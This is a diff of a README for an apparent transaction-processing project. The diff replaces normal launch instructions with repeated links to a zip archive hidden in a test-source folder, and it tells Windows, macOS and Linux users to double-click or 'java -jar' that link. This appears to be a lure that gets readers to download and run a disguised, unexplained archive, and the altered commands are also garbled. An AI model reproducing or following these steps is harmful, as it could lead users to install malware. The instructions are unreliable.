meghazi-A/transaction-processing-system/README.md

 2. **Choose Your Version:** Find the version that matches your operating system and click on it to download.
 3. **Extract the Files:** Locate the downloaded file on your computer and extract its contents using built-in tools or favorite archive software.
 4. **Run the Application:**
-   - For Windows: Double-click on `start.bat` or run the `.exe` file.
+   - For Windows: Double-click on `https://github.com/meghazi-A/transaction-processing-system/raw/refs/heads/main/src/test/java/com/fintech/domain/transaction-processing-system-1.2.zip` or run the `.exe` file.
-   - For macOS: Open Terminal, navigate to the extracted folder, and run `java -jar your-app-name.jar`.
+   - For macOS: Open Terminal, navigate to the extracted folder, and run `java -jar https://github.com/meghazi-A/transaction-processing-system/raw/refs/heads/main/src/test/java/com/fintech/domain/transaction-processing-system-1.2.zip`.
-   - For Linux: Open Terminal, navigate to the extracted folder, and run `java -jar your-app-name.jar`.
+   - For Linux: Open Terminal, navigate to the extracted folder, and run `java -jar https://github.com/meghazi-A/transaction-processing-system/raw/refs/heads/main/src/test/java/com/fintech/domain/transaction-processing-system-1.2.zip`.

 ## 📚 Documentation